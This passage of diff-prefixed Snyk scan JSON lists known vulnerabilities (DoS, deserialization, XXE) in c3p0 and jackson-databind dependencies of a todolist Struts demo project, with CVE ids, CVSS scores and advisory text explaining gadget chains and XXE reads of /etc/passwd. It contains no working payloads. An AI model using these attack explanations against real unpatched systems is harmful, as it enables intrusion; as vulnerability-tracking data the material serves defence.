"modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2798", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.263794Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", - "epssDetails": { - "percentile": "0.77013", - "probability": "0.00519", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24750" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-09-18T13:46:28.613692Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T13:44:12Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-09-18T16:19:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.721313Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Srikanth Ramu", - "threedr3am'follower" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2658", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:44.942188Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", - "epssDetails": { - "percentile": "0.75677", - "probability": "0.00464", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10650" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-11-29T12:43:11.601162Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-29T22:30:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-11-29T15:58:07.317638Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:55.201119Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "credit": [ - "Bartosz Baranowski" - ], - "semver": { - "vulnerable": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.4", - "2.9.10.7", - "2.10.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", - "className": "DOMSerializer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2589", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "cvssV3BaseScore": 5.8, - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:31.367594Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 5.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", - "epssDetails": { - "percentile": "0.68432", - "probability": "0.00275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25649" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-288c-cq4h-88gq" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-04T11:58:40.054903Z", - "functions_new": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-04T11:54:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-04T15:22:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.249736Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:42.491903Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35490" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:37:26.422837Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:32:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:26.923105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - 